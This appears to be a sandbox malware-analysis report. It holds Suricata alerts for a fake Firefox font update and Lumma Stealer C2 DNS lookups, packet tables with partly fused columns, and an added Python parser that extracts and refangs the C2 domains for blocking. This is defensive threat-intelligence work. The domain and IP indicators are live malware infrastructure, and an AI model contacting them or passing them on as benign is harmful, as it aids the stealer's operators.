2025-04-28T19:34:55.245027+0200 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49700 | 104.21.36.133 | 443 | TCP
2025-04-28T19:34:56.620929+0200 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49701 | 104.21.36.133 | 443 | TCP
2025-04-28T19:34:59.244166+0200 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49702 | 104.21.36.133 | 443 | TCP
2025-04-28T19:35:01.243642+0200 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49703 | 104.21.36.133 | 443 | TCP
2025-04-28T19:35:04.153586+0200 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49704 | 104.21.36.133 | 443 | TCP
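As the text extractor delivered it, each alert row above fuses nine columns into one string, and the digit runs where an IP address meets a port are genuinely ambiguous ("192.168.2.549695" can be ".5" + "49695" or ".54" + "9695"; "172.67.182.68443" can be ".68" + "443" or ".6" + "8443"). The Python below is an added example, not part of the Joe Sandbox report: it enumerates every split that yields valid octets and ports, narrows them with two assumptions that the report does not state (the client is a Windows VM using ephemeral ports from 49152 up, and the alerts target well-known server ports, held in MIN_EPHEMERAL_PORT and KNOWN_SERVER_PORTS), refuses to guess when more than one split survives, and refangs the "(host .tld)" domains named by the Lumma DNS-lookup signatures into a deduplicated IOC list. The sample rows are four lines of the table above, copied as the extractor flattened them.

```python
"""Recover the Suricata alert columns from the flattened rows of the sandbox
report and pull the Lumma C2 domains out of the matching signatures.

Added example, not part of the Joe Sandbox report. Rows below are the report's
own alert lines as the text extraction ran them together; the port assumptions
used to disambiguate them are marked as such.
"""
import re
from dataclasses import dataclass
from typing import Iterable, List, Set, Tuple

# Constructed input: alert rows copied from the report with the columns fused.
FLAT_ROWS = [
    "2025-04-28T19:34:28.895163+02002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549695172.67.182.68443TCP",
    "2025-04-28T19:34:48.826594+02002061853ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (geographys .run)1192.168.2.5577281.1.1.153UDP",
    "2025-04-28T19:34:49.176939+02002061859ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (tropiscbs .live)1192.168.2.5607151.1.1.153UDP",
    "2025-04-28T19:34:51.062891+02002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.54969823.52.218.12443TCP",
]

# Assumptions, not stated by the report: the client is a Windows VM whose
# ephemeral ports start at 49152, and the alerts target well-known server
# ports. Without them the fused digit runs have several valid splits.
MIN_EPHEMERAL_PORT = 49152
KNOWN_SERVER_PORTS = {53, 80, 443}

ROW_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2}T\d{2}:\d{2}:\d{2}\.\d+[+-]\d{4})"
    r"(?P<sid>\d{7})"               # Emerging Threats SIDs are seven digits
    r"(?P<sig>.*?)(?P<sev>[1-4])"   # lazy: severity is the first digit that is
    r"(?P<addrs>\d+(?:\.\d+){6})"   # followed by two fused IPv4s (7 dot groups)
    r"(?P<proto>TCP|UDP|ICMP)$"
)
# The report defangs domains as "(host .tld)"; capture both halves to refang.
DEFANGED_DOMAIN_RE = re.compile(r"\(([A-Za-z0-9-]+) \.([A-Za-z0-9-]+)\)")


@dataclass(frozen=True)
class Alert:
    timestamp: str
    sid: int
    signature: str
    severity: int
    src_ip: str
    src_port: int
    dst_ip: str
    dst_port: int
    proto: str


def _octet(s: str) -> bool:
    return s.isdigit() and len(s) <= 3 and (s == "0" or s[0] != "0") and int(s) <= 255


def _port(s: str) -> bool:
    return s.isdigit() and s[0] != "0" and 1 <= int(s) <= 65535


def split_addresses(fused: str, min_src_port: int, server_ports: Set[int]) -> Tuple[str, int, str, int]:
    """Split 'A.B.C.<D+sport+E>.F.G.<H+dport>' into (src_ip, sport, dst_ip, dport).

    Every split with valid octets and ports is enumerated, then filtered by the
    ephemeral-port and server-port assumptions. Exactly one survivor is
    required: a wrong address in an IOC list is worse than none.
    """
    parts = fused.split(".")
    if len(parts) != 7:
        raise ValueError(f"expected two fused IPv4 addresses, got {fused!r}")
    a, b, c, mid, e, f, end = parts
    found = []
    for i in range(1, len(mid)):
        for j in range(i + 1, len(mid)):
            so, sp, do = mid[:i], mid[i:j], mid[j:]
            if not (_octet(so) and _port(sp) and _octet(do)) or int(sp) < min_src_port:
                continue
            for k in range(1, len(end)):
                dl, dp = end[:k], end[k:]
                if _octet(dl) and _port(dp) and int(dp) in server_ports:
                    found.append((f"{a}.{b}.{c}.{so}", int(sp), f"{do}.{e}.{f}.{dl}", int(dp)))
    if len(found) != 1:
        raise ValueError(f"ambiguous or impossible address split {fused!r}: {found}")
    return found[0]


def parse_alert(row: str, min_src_port: int = MIN_EPHEMERAL_PORT,
                server_ports: Set[int] = KNOWN_SERVER_PORTS) -> Alert:
    m = ROW_RE.match(row)
    if not m:
        raise ValueError(f"unrecognised alert row: {row!r}")
    src_ip, sport, dst_ip, dport = split_addresses(m["addrs"], min_src_port, server_ports)
    return Alert(m["ts"], int(m["sid"]), m["sig"], int(m["sev"]), src_ip, sport, dst_ip, dport, m["proto"])


def parse_alerts(rows: Iterable[str]) -> List[Alert]:
    return [parse_alert(r) for r in rows]


def c2_domains(alerts: Iterable[Alert]) -> List[str]:
    """Refanged, deduplicated domains from the Lumma DNS-lookup signatures."""
    out = set()
    for a in alerts:
        if "CnC Domain in DNS Lookup" in a.signature:
            for host, tld in DEFANGED_DOMAIN_RE.findall(a.signature):
                out.add(f"{host}.{tld}")
    return sorted(out)


if __name__ == "__main__":
    alerts = parse_alerts(FLAT_ROWS)
    for a in alerts:
        print(f"sev{a.severity} {a.sid} {a.src_ip}:{a.src_port} -> {a.dst_ip}:{a.dst_port}/{a.proto}")
    print("C2 domains:", ", ".join(c2_domains(alerts)))
```

The severity/address boundary relies on the signature text not ending in a digit, which holds for the ET signatures in this report but should be checked before reusing the parser on other rule sets. Adding 8443 to KNOWN_SERVER_PORTS makes the first row ambiguous again and the parser raises rather than picking one, which is the behaviour you want when the output feeds a blocklist. The refanged names are the live C2 lookups the sample made; treat them as indicators to block, not addresses to visit.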
• Total Packets: 118
• 443 (HTTPS)
• 53 (DNS)
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Apr 28, 2025 19:34:28.511717081 CEST | 49695 | 443 | 192.168.2.5 | 172.67.182.68
Apr 28, 2025 19:34:28.511774063 CEST | 443 | 49695 | 172.67.182.68 | 192.168.2.5
Apr 28, 2025 19:34:28.511847019 CEST | 49695 | 443 | 192.168.2.5 | 172.67.182.68
Apr 28, 2025 19:34:28.513199091 CEST | 49695 | 443 | 192.168.2.5 | 172.67.182.68
Apr 28, 2025 19:34:28.513209105 CEST | 443 | 49695 | 172.67.182.68 | 192.168.2.5
Apr 28, 2025 19:34:28.895051956 CEST | 443 | 49695 | 172.67.182.68 | 192.168.2.5
Apr 28, 2025 19:34:28.895163059 CEST | 49695 | 443 | 192.168.2.5 | 172.67.182.68
Apr 28, 2025 19:34:28.899089098 CEST | 49695 | 443 | 192.168.2.5 | 172.67.182.68
Apr 28, 2025 19:34:28.899100065 CEST | 443 | 49695 | 172.67.182.68 | 192.168.2.5
Apr 28, 2025 19:34:28.899847984 CEST | 443 | 49695 | 172.67.182.68 | 192.168.2.5
Apr 28, 2025 19:34:28.937721014 CEST | 49695 | 443 | 192.168.2.5 | 172.67.182.68
Apr 28, 2025 19:34:28.937755108 CEST | 49695 | 443 | 192.168.2.5 | 172.67.182.68
Apr 28, 2025 19:34:28.937911987 CEST | 443 | 49695 | 172.67.182.68 | 192.168.2.5
Apr 28, 2025 19:34:48.796422005 CEST | 443 | 49695 | 172.67.182.68 | 192.168.2.5
Apr 28, 2025 19:34:48.850117922 CEST | 49695 | 443 | 192.168.2.5 | 172.67.182.68
Apr 28, 2025 19:34:50.752809048 CEST | 49698 | 443 | 192.168.2.5 | 23.52.218.12
Apr 28, 2025 19:34:50.752839088 CEST | 443 | 49698 | 23.52.218.12 | 192.168.2.5
Apr 28, 2025 19:34:50.752922058 CEST | 49698 | 443 | 192.168.2.5 | 23.52.218.12
Apr 28, 2025 19:34:50.753264904 CEST | 49698 | 443 | 192.168.2.5 | 23.52.218.12
Apr 28, 2025 19:34:50.753273964 CEST | 443 | 49698 | 23.52.218.12 | 192.168.2.5
Apr 28, 2025 19:34:51.062808037 CEST | 443 | 49698 | 23.52.218.12 | 192.168.2.5
Apr 28, 2025 19:34:51.062891006 CEST | 49698 | 443 | 192.168.2.5 | 23.52.218.12
Apr 28, 2025 19:34:51.064337015 CEST | 49698 | 443 | 192.168.2.5 | 23.52.218.12
Apr 28, 2025 19:34:51.064342022 CEST | 443 | 49698 | 23.52.218.12 | 192.168.2.5
Apr 28, 2025 19:34:51.065002918 CEST | 443 | 49698 | 23.52.218.12 | 192.168.2.5
Apr 28, 2025 19:34:51.065989971 CEST | 49698 | 443 | 192.168.2.5 | 23.52.218.12
Apr 28, 2025 19:34:51.108299017 CEST | 443 | 49698 | 23.52.218.12 | 192.168.2.5
Apr 28, 2025 19:34:51.369265079 CEST | 443 | 49698 | 23.52.218.12 | 192.168.2.5
Apr 28, 2025 19:34:51.369606972 CEST | 49698 | 443 | 192.168.2.5 | 23.52.218.12
Apr 28, 2025 19:34:51.371423960 CEST | 443 | 49698 | 23.52.218.12 | 192.168.2.5
Apr 28, 2025 19:34:51.371460915 CEST | 443 | 49698 | 23.52.218.12 | 192.168.2.5
                                                                                                                                                                                                                          Apr 28, 2025 19:34:51.371537924 CEST49698443192.168.2.523.52.218.12
                                                                                                                                                                                                                          Apr 28, 2025 19:34:51.371566057 CEST49698443192.168.2.523.52.218.12
                                                                                                                                                                                                                          Apr 28, 2025 19:34:51.501975060 CEST4434969823.52.218.12192.168.2.5
                                                                                                                                                                                                                          Apr 28, 2025 19:34:51.502182961 CEST49698443192.168.2.523.52.218.12
                                                                                                                                                                                                                          Apr 28, 2025 19:34:51.529293060 CEST4434969823.52.218.12192.168.2.5
                                                                                                                                                                                                                          Apr 28, 2025 19:34:51.529433012 CEST49698443192.168.2.523.52.218.12
                                                                                                                                                                                                                          Apr 28, 2025 19:34:51.744782925 CEST49699443192.168.2.5104.21.36.133
                                                                                                                                                                                                                          Apr 28, 2025 19:34:51.744883060 CEST44349699104.21.36.133192.168.2.5
                                                                                                                                                                                                                          Apr 28, 2025 19:34:51.744967937 CEST49699443192.168.2.5104.21.36.133
                                                                                                                                                                                                                          Apr 28, 2025 19:34:51.745323896 CEST49699443192.168.2.5104.21.36.133
                                                                                                                                                                                                                          Apr 28, 2025 19:34:51.745345116 CEST44349699104.21.36.133192.168.2.5
                                                                                                                                                                                                                          Apr 28, 2025 19:34:52.111630917 CEST44349699104.21.36.133192.168.2.5
                                                                                                                                                                                                                          Apr 28, 2025 19:34:52.111728907 CEST49699443192.168.2.5104.21.36.133
                                                                                                                                                                                                                          Apr 28, 2025 19:34:52.119738102 CEST49699443192.168.2.5104.21.36.133
                                                                                                                                                                                                                          Apr 28, 2025 19:34:52.119767904 CEST44349699104.21.36.133192.168.2.5
                                                                                                                                                                                                                          Apr 28, 2025 19:34:52.120543003 CEST44349699104.21.36.133192.168.2.5
                                                                                                                                                                                                                          Apr 28, 2025 19:34:52.121608973 CEST49699443192.168.2.5104.21.36.133
                                                                                                                                                                                                                          Apr 28, 2025 19:34:52.121653080 CEST49699443192.168.2.5104.21.36.133
                                                                                                                                                                                                                          Apr 28, 2025 19:34:52.121685028 CEST44349699104.21.36.133192.168.2.5
                                                                                                                                                                                                                          Apr 28, 2025 19:34:52.733427048 CEST44349699104.21.36.133192.168.2.5
                                                                                                                                                                                                                          Apr 28, 2025 19:34:52.734555960 CEST44349699104.21.36.133192.168.2.5
                                                                                                                                                                                                                          Apr 28, 2025 19:34:52.734663010 CEST49699443192.168.2.5104.21.36.133
                                                                                                                                                                                                                          Apr 28, 2025 19:34:52.736370087 CEST44349699104.21.36.133192.168.2.5
                                                                                                                                                                                                                          Apr 28, 2025 19:34:52.736577034 CEST49699443192.168.2.5104.21.36.133
                                                                                                                                                                                                                          Apr 28, 2025 19:34:52.754018068 CEST44349699104.21.36.133192.168.2.5
                                                                                                                                                                                                                          Apr 28, 2025 19:34:52.754117012 CEST49699443192.168.2.5104.21.36.133
                                                                                                                                                                                                                          Apr 28, 2025 19:34:52.755237103 CEST44349699104.21.36.133192.168.2.5
                                                                                                                                                                                                                          Apr 28, 2025 19:34:52.803149939 CEST49699443192.168.2.5104.21.36.133
                                                                                                                                                                                                                          Apr 28, 2025 19:34:52.891115904 CEST44349699104.21.36.133192.168.2.5
                                                                                                                                                                                                                          Apr 28, 2025 19:34:52.891210079 CEST49699443192.168.2.5104.21.36.133
                                                                                                                                                                                                                          Apr 28, 2025 19:34:52.893121958 CEST44349699104.21.36.133192.168.2.5
                                                                                                                                                                                                                          Apr 28, 2025 19:34:52.893157005 CEST44349699104.21.36.133192.168.2.5
                                                                                                                                                                                                                          Apr 28, 2025 19:34:52.893224001 CEST49699443192.168.2.5104.21.36.133
                                                                                                                                                                                                                          Apr 28, 2025 19:34:52.893223047 CEST44349699104.21.36.133192.168.2.5
                                                                                                                                                                                                                          Apr 28, 2025 19:34:52.893296003 CEST49699443192.168.2.5104.21.36.133
                                                                                                                                                                                                                          Apr 28, 2025 19:34:52.894691944 CEST44349699104.21.36.133192.168.2.5
                                                                                                                                                                                                                          Apr 28, 2025 19:34:52.894767046 CEST49699443192.168.2.5104.21.36.133
                                                                                                                                                                                                                          Apr 28, 2025 19:34:53.349978924 CEST49699443192.168.2.5104.21.36.133
                                                                                                                                                                                                                          Apr 28, 2025 19:34:53.350081921 CEST49699443192.168.2.5104.21.36.133
                                                                                                                                                                                                                          Apr 28, 2025 19:34:53.350363016 CEST44349699104.21.36.133192.168.2.5
                                                                                                                                                                                                                          Apr 28, 2025 19:34:53.350455046 CEST49699443192.168.2.5104.21.36.133
                                                                                                                                                                                                                          Apr 28, 2025 19:34:53.396270990 CEST44349699104.21.36.133192.168.2.5
                                                                                                                                                                                                                          Apr 28, 2025 19:34:54.559277058 CEST44349699104.21.36.133192.168.2.5
                                                                                                                                                                                                                          Apr 28, 2025 19:34:54.559478998 CEST44349699104.21.36.133192.168.2.5
                                                                                                                                                                                                                          Apr 28, 2025 19:34:54.559573889 CEST49699443192.168.2.5104.21.36.133
                                                                                                                                                                                                                          Apr 28, 2025 19:34:54.559760094 CEST49699443192.168.2.5104.21.36.133
                                                                                                                                                                                                                          Apr 28, 2025 19:34:54.559978008 CEST44349699104.21.36.133192.168.2.5
                                                                                                                                                                                                                          Apr 28, 2025 19:34:54.560036898 CEST49699443192.168.2.5104.21.36.133
                                                                                                                                                                                                                          Apr 28, 2025 19:34:54.887079954 CEST49700443192.168.2.5104.21.36.133
                                                                                                                                                                                                                          Apr 28, 2025 19:34:54.887162924 CEST44349700104.21.36.133192.168.2.5
                                                                                                                                                                                                                          Apr 28, 2025 19:34:54.887239933 CEST49700443192.168.2.5104.21.36.133
                                                                                                                                                                                                                          Apr 28, 2025 19:34:54.887768030 CEST49700443192.168.2.5104.21.36.133
                                                                                                                                                                                                                          Apr 28, 2025 19:34:54.887787104 CEST44349700104.21.36.133192.168.2.5
                                                                                                                                                                                                                          Apr 28, 2025 19:34:55.244801044 CEST44349700104.21.36.133192.168.2.5
                                                                                                                                                                                                                          Apr 28, 2025 19:34:55.245027065 CEST49700443192.168.2.5104.21.36.133
                                                                                                                                                                                                                          Apr 28, 2025 19:34:55.246231079 CEST49700443192.168.2.5104.21.36.133
                                                                                                                                                                                                                          Apr 28, 2025 19:34:55.246258974 CEST44349700104.21.36.133192.168.2.5
                                                                                                                                                                                                                          Apr 28, 2025 19:34:55.247116089 CEST44349700104.21.36.133192.168.2.5
                                                                                                                                                                                                                          Apr 28, 2025 19:34:55.248198032 CEST49700443192.168.2.5104.21.36.133
                                                                                                                                                                                                                          Apr 28, 2025 19:34:55.248337984 CEST49700443192.168.2.5104.21.36.133
                                                                                                                                                                                                                          Apr 28, 2025 19:34:55.249758959 CEST44349700104.21.36.133192.168.2.5
                                                                                                                                                                                                                          Apr 28, 2025 19:34:55.249864101 CEST49700443192.168.2.5104.21.36.133
                                                                                                                                                                                                                          Apr 28, 2025 19:34:55.250493050 CEST44349700104.21.36.133192.168.2.5
                                                                                                                                                                                                                          Apr 28, 2025 19:34:55.946224928 CEST44349700104.21.36.133192.168.2.5
                                                                                                                                                                                                                          Apr 28, 2025 19:34:55.946424961 CEST44349700104.21.36.133192.168.2.5
                                                                                                                                                                                                                          Apr 28, 2025 19:34:55.946491957 CEST49700443192.168.2.5104.21.36.133
                                                                                                                                                                                                                          Apr 28, 2025 19:34:55.946553946 CEST49700443192.168.2.5104.21.36.133
                                                                                                                                                                                                                          Apr 28, 2025 19:34:55.946573019 CEST44349700104.21.36.133192.168.2.5
                                                                                                                                                                                                                          Apr 28, 2025 19:34:55.946621895 CEST49700443192.168.2.5104.21.36.133
                                                                                                                                                                                                                          Apr 28, 2025 19:34:56.266017914 CEST49701443192.168.2.5104.21.36.133
                                                                                                                                                                                                                          Apr 28, 2025 19:34:56.266098976 CEST44349701104.21.36.133192.168.2.5
                                                                                                                                                                                                                          Apr 28, 2025 19:34:56.266191959 CEST49701443192.168.2.5104.21.36.133
                                                                                                                                                                                                                          Apr 28, 2025 19:34:56.266493082 CEST49701443192.168.2.5104.21.36.133
                                                                                                                                                                                                                          Apr 28, 2025 19:34:56.266509056 CEST44349701104.21.36.133192.168.2.5
                                                                                                                                                                                                                          Apr 28, 2025 19:34:56.620727062 CEST44349701104.21.36.133192.168.2.5
                                                                                                                                                                                                                          Apr 28, 2025 19:34:56.620929003 CEST49701443192.168.2.5104.21.36.133
                                                                                                                                                                                                                          Apr 28, 2025 19:34:56.622364044 CEST49701443192.168.2.5104.21.36.133
                                                                                                                                                                                                                          Apr 28, 2025 19:34:56.622374058 CEST44349701104.21.36.133192.168.2.5
                                                                                                                                                                                                                          Apr 28, 2025 19:34:56.622776031 CEST44349701104.21.36.133192.168.2.5
                                                                                                                                                                                                                          Apr 28, 2025 19:34:56.624347925 CEST49701443192.168.2.5104.21.36.133
                                                                                                                                                                                                                          Apr 28, 2025 19:34:56.624506950 CEST49701443192.168.2.5104.21.36.133
                                                                                                                                                                                                                          Apr 28, 2025 19:34:56.625971079 CEST44349701104.21.36.133192.168.2.5
                                                                                                                                                                                                                          Apr 28, 2025 19:34:56.626079082 CEST49701443192.168.2.5104.21.36.133
                                                                                                                                                                                                                          Apr 28, 2025 19:34:56.626476049 CEST44349701104.21.36.133192.168.2.5
                                                                                                                                                                                                                          Apr 28, 2025 19:34:57.495385885 CEST44349701104.21.36.133192.168.2.5
                                                                                                                                                                                                                          Apr 28, 2025 19:34:57.495577097 CEST44349701104.21.36.133192.168.2.5
                                                                                                                                                                                                                          Apr 28, 2025 19:34:57.495670080 CEST49701443192.168.2.5104.21.36.133
                                                                                                                                                                                                                          Apr 28, 2025 19:34:57.495712996 CEST49701443192.168.2.5104.21.36.133
                                                                                                                                                                                                                          Apr 28, 2025 19:34:58.902874947 CEST49702443192.168.2.5104.21.36.133
                                                                                                                                                                                                                          Apr 28, 2025 19:34:58.902945995 CEST44349702104.21.36.133192.168.2.5
                                                                                                                                                                                                                          Apr 28, 2025 19:34:58.903018951 CEST49702443192.168.2.5104.21.36.133
                                                                                                                                                                                                                          Apr 28, 2025 19:34:58.903320074 CEST49702443192.168.2.5104.21.36.133
                                                                                                                                                                                                                          Apr 28, 2025 19:34:58.903328896 CEST44349702104.21.36.133192.168.2.5
                                                                                                                                                                                                                          Apr 28, 2025 19:34:59.244038105 CEST44349702104.21.36.133192.168.2.5
                                                                                                                                                                                                                          Apr 28, 2025 19:34:59.244165897 CEST49702443192.168.2.5104.21.36.133
                                                                                                                                                                                                                          Apr 28, 2025 19:34:59.245918989 CEST49702443192.168.2.5104.21.36.133
                                                                                                                                                                                                                          Apr 28, 2025 19:34:59.245933056 CEST44349702104.21.36.133192.168.2.5
                                                                                                                                                                                                                          Apr 28, 2025 19:34:59.246308088 CEST44349702104.21.36.133192.168.2.5
Apr 28, 2025 19:34:59.247951031 CEST | 49702 | 443 | 192.168.2.5 | 104.21.36.133
Apr 28, 2025 19:34:59.248080969 CEST | 49702 | 443 | 192.168.2.5 | 104.21.36.133
Apr 28, 2025 19:34:59.248918056 CEST | 443 | 49702 | 104.21.36.133 | 192.168.2.5
Apr 28, 2025 19:34:59.672833920 CEST | 443 | 49702 | 104.21.36.133 | 192.168.2.5
Apr 28, 2025 19:34:59.673022032 CEST | 443 | 49702 | 104.21.36.133 | 192.168.2.5
Apr 28, 2025 19:34:59.673171043 CEST | 443 | 49702 | 104.21.36.133 | 192.168.2.5
Apr 28, 2025 19:34:59.673191071 CEST | 49702 | 443 | 192.168.2.5 | 104.21.36.133
Apr 28, 2025 19:34:59.673191071 CEST | 49702 | 443 | 192.168.2.5 | 104.21.36.133
Apr 28, 2025 19:34:59.673238039 CEST | 49702 | 443 | 192.168.2.5 | 104.21.36.133
Apr 28, 2025 19:35:00.889539957 CEST | 49703 | 443 | 192.168.2.5 | 104.21.36.133
Apr 28, 2025 19:35:00.889583111 CEST | 443 | 49703 | 104.21.36.133 | 192.168.2.5
Apr 28, 2025 19:35:00.889717102 CEST | 49703 | 443 | 192.168.2.5 | 104.21.36.133
Apr 28, 2025 19:35:00.890120029 CEST | 49703 | 443 | 192.168.2.5 | 104.21.36.133
Apr 28, 2025 19:35:00.890129089 CEST | 443 | 49703 | 104.21.36.133 | 192.168.2.5
Apr 28, 2025 19:35:01.243560076 CEST | 443 | 49703 | 104.21.36.133 | 192.168.2.5
Apr 28, 2025 19:35:01.243642092 CEST | 49703 | 443 | 192.168.2.5 | 104.21.36.133
Apr 28, 2025 19:35:01.244823933 CEST | 49703 | 443 | 192.168.2.5 | 104.21.36.133
Apr 28, 2025 19:35:01.244834900 CEST | 443 | 49703 | 104.21.36.133 | 192.168.2.5
Apr 28, 2025 19:35:01.245378017 CEST | 443 | 49703 | 104.21.36.133 | 192.168.2.5
Apr 28, 2025 19:35:01.287561893 CEST | 49703 | 443 | 192.168.2.5 | 104.21.36.133
Apr 28, 2025 19:35:01.334135056 CEST | 49703 | 443 | 192.168.2.5 | 104.21.36.133
Apr 28, 2025 19:35:01.335120916 CEST | 49703 | 443 | 192.168.2.5 | 104.21.36.133
Apr 28, 2025 19:35:01.335848093 CEST | 443 | 49703 | 104.21.36.133 | 192.168.2.5
Apr 28, 2025 19:35:01.335972071 CEST | 49703 | 443 | 192.168.2.5 | 104.21.36.133
Apr 28, 2025 19:35:01.336016893 CEST | 443 | 49703 | 104.21.36.133 | 192.168.2.5
Apr 28, 2025 19:35:01.336127996 CEST | 49703 | 443 | 192.168.2.5 | 104.21.36.133
Apr 28, 2025 19:35:01.336905956 CEST | 443 | 49703 | 104.21.36.133 | 192.168.2.5
Apr 28, 2025 19:35:01.337032080 CEST | 49703 | 443 | 192.168.2.5 | 104.21.36.133
Apr 28, 2025 19:35:01.337064981 CEST | 443 | 49703 | 104.21.36.133 | 192.168.2.5
Apr 28, 2025 19:35:01.337204933 CEST | 49703 | 443 | 192.168.2.5 | 104.21.36.133
Apr 28, 2025 19:35:01.337235928 CEST | 443 | 49703 | 104.21.36.133 | 192.168.2.5
Apr 28, 2025 19:35:01.337379932 CEST | 49703 | 443 | 192.168.2.5 | 104.21.36.133
Apr 28, 2025 19:35:01.337409973 CEST | 443 | 49703 | 104.21.36.133 | 192.168.2.5
Apr 28, 2025 19:35:01.337423086 CEST | 49703 | 443 | 192.168.2.5 | 104.21.36.133
Apr 28, 2025 19:35:01.337443113 CEST | 443 | 49703 | 104.21.36.133 | 192.168.2.5
Apr 28, 2025 19:35:01.337549925 CEST | 49703 | 443 | 192.168.2.5 | 104.21.36.133
Apr 28, 2025 19:35:01.337582111 CEST | 443 | 49703 | 104.21.36.133 | 192.168.2.5
Apr 28, 2025 19:35:01.337610006 CEST | 49703 | 443 | 192.168.2.5 | 104.21.36.133
Apr 28, 2025 19:35:01.337624073 CEST | 443 | 49703 | 104.21.36.133 | 192.168.2.5
Apr 28, 2025 19:35:01.337690115 CEST | 49703 | 443 | 192.168.2.5 | 104.21.36.133
Apr 28, 2025 19:35:01.337709904 CEST | 443 | 49703 | 104.21.36.133 | 192.168.2.5
Apr 28, 2025 19:35:01.337729931 CEST | 49703 | 443 | 192.168.2.5 | 104.21.36.133
Apr 28, 2025 19:35:01.337744951 CEST | 443 | 49703 | 104.21.36.133 | 192.168.2.5
Apr 28, 2025 19:35:01.337791920 CEST | 49703 | 443 | 192.168.2.5 | 104.21.36.133
Apr 28, 2025 19:35:01.337816954 CEST | 443 | 49703 | 104.21.36.133 | 192.168.2.5
Apr 28, 2025 19:35:01.337836981 CEST | 49703 | 443 | 192.168.2.5 | 104.21.36.133
Apr 28, 2025 19:35:01.337858915 CEST | 443 | 49703 | 104.21.36.133 | 192.168.2.5
Apr 28, 2025 19:35:01.337894917 CEST | 49703 | 443 | 192.168.2.5 | 104.21.36.133
Apr 28, 2025 19:35:01.338053942 CEST | 443 | 49703 | 104.21.36.133 | 192.168.2.5
Apr 28, 2025 19:35:03.662631035 CEST | 443 | 49703 | 104.21.36.133 | 192.168.2.5
Apr 28, 2025 19:35:03.662688017 CEST | 443 | 49703 | 104.21.36.133 | 192.168.2.5
Apr 28, 2025 19:35:03.662728071 CEST | 443 | 49703 | 104.21.36.133 | 192.168.2.5
Apr 28, 2025 19:35:03.662749052 CEST | 49703 | 443 | 192.168.2.5 | 104.21.36.133
Apr 28, 2025 19:35:03.665887117 CEST | 49703 | 443 | 192.168.2.5 | 104.21.36.133
Apr 28, 2025 19:35:03.666093111 CEST | 443 | 49703 | 104.21.36.133 | 192.168.2.5
Apr 28, 2025 19:35:03.666146994 CEST | 49703 | 443 | 192.168.2.5 | 104.21.36.133
Apr 28, 2025 19:35:03.800678968 CEST | 49704 | 443 | 192.168.2.5 | 104.21.36.133
Apr 28, 2025 19:35:03.800725937 CEST | 443 | 49704 | 104.21.36.133 | 192.168.2.5
Apr 28, 2025 19:35:03.801090002 CEST | 49704 | 443 | 192.168.2.5 | 104.21.36.133
Apr 28, 2025 19:35:03.801342964 CEST | 49704 | 443 | 192.168.2.5 | 104.21.36.133
Apr 28, 2025 19:35:03.801348925 CEST | 443 | 49704 | 104.21.36.133 | 192.168.2.5
Apr 28, 2025 19:35:04.153470039 CEST | 443 | 49704 | 104.21.36.133 | 192.168.2.5
Apr 28, 2025 19:35:04.153585911 CEST | 49704 | 443 | 192.168.2.5 | 104.21.36.133
Apr 28, 2025 19:35:04.154761076 CEST | 49704 | 443 | 192.168.2.5 | 104.21.36.133
Apr 28, 2025 19:35:04.154766083 CEST | 443 | 49704 | 104.21.36.133 | 192.168.2.5
Apr 28, 2025 19:35:04.155375957 CEST | 443 | 49704 | 104.21.36.133 | 192.168.2.5
Apr 28, 2025 19:35:04.209485054 CEST | 49704 | 443 | 192.168.2.5 | 104.21.36.133
Apr 28, 2025 19:35:04.217695951 CEST | 49704 | 443 | 192.168.2.5 | 104.21.36.133
Apr 28, 2025 19:35:04.217695951 CEST | 49704 | 443 | 192.168.2.5 | 104.21.36.133
Apr 28, 2025 19:35:04.217932940 CEST | 443 | 49704 | 104.21.36.133 | 192.168.2.5
Apr 28, 2025 19:35:04.668612957 CEST | 443 | 49704 | 104.21.36.133 | 192.168.2.5
Apr 28, 2025 19:35:04.669495106 CEST | 443 | 49704 | 104.21.36.133 | 192.168.2.5
Apr 28, 2025 19:35:04.669569969 CEST | 49704 | 443 | 192.168.2.5 | 104.21.36.133
Apr 28, 2025 19:35:05.247796059 CEST | 49695 | 443 | 192.168.2.5 | 172.67.182.68
Apr 28, 2025 19:35:05.248075008 CEST | 49698 | 443 | 192.168.2.5 | 23.52.218.12
Apr 28, 2025 19:35:05.248172998 CEST | 49704 | 443 | 192.168.2.5 | 104.21.36.133
UDP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Apr 28, 2025 19:34:09.525156975 CEST | 53 | 57156 | 1.1.1.1 | 192.168.2.5
Apr 28, 2025 19:34:28.271243095 CEST | 50046 | 53 | 192.168.2.5 | 1.1.1.1
Apr 28, 2025 19:34:28.478075981 CEST | 53 | 50046 | 1.1.1.1 | 192.168.2.5
Apr 28, 2025 19:34:48.826594114 CEST | 57728 | 53 | 192.168.2.5 | 1.1.1.1
Apr 28, 2025 19:34:48.990664005 CEST | 53 | 57728 | 1.1.1.1 | 192.168.2.5
Apr 28, 2025 19:34:49.001962900 CEST | 49643 | 53 | 192.168.2.5 | 1.1.1.1
Apr 28, 2025 19:34:49.167403936 CEST | 53 | 49643 | 1.1.1.1 | 192.168.2.5
Apr 28, 2025 19:34:49.176939011 CEST | 60715 | 53 | 192.168.2.5 | 1.1.1.1
Apr 28, 2025 19:34:49.336050987 CEST | 53 | 60715 | 1.1.1.1 | 192.168.2.5
Apr 28, 2025 19:34:49.338097095 CEST | 59381 | 53 | 192.168.2.5 | 1.1.1.1
Apr 28, 2025 19:34:49.492019892 CEST | 53 | 59381 | 1.1.1.1 | 192.168.2.5
Apr 28, 2025 19:34:49.494621038 CEST | 59328 | 53 | 192.168.2.5 | 1.1.1.1
Apr 28, 2025 19:34:49.653400898 CEST | 53 | 59328 | 1.1.1.1 | 192.168.2.5
Apr 28, 2025 19:34:49.655128002 CEST | 59371 | 53 | 192.168.2.5 | 1.1.1.1
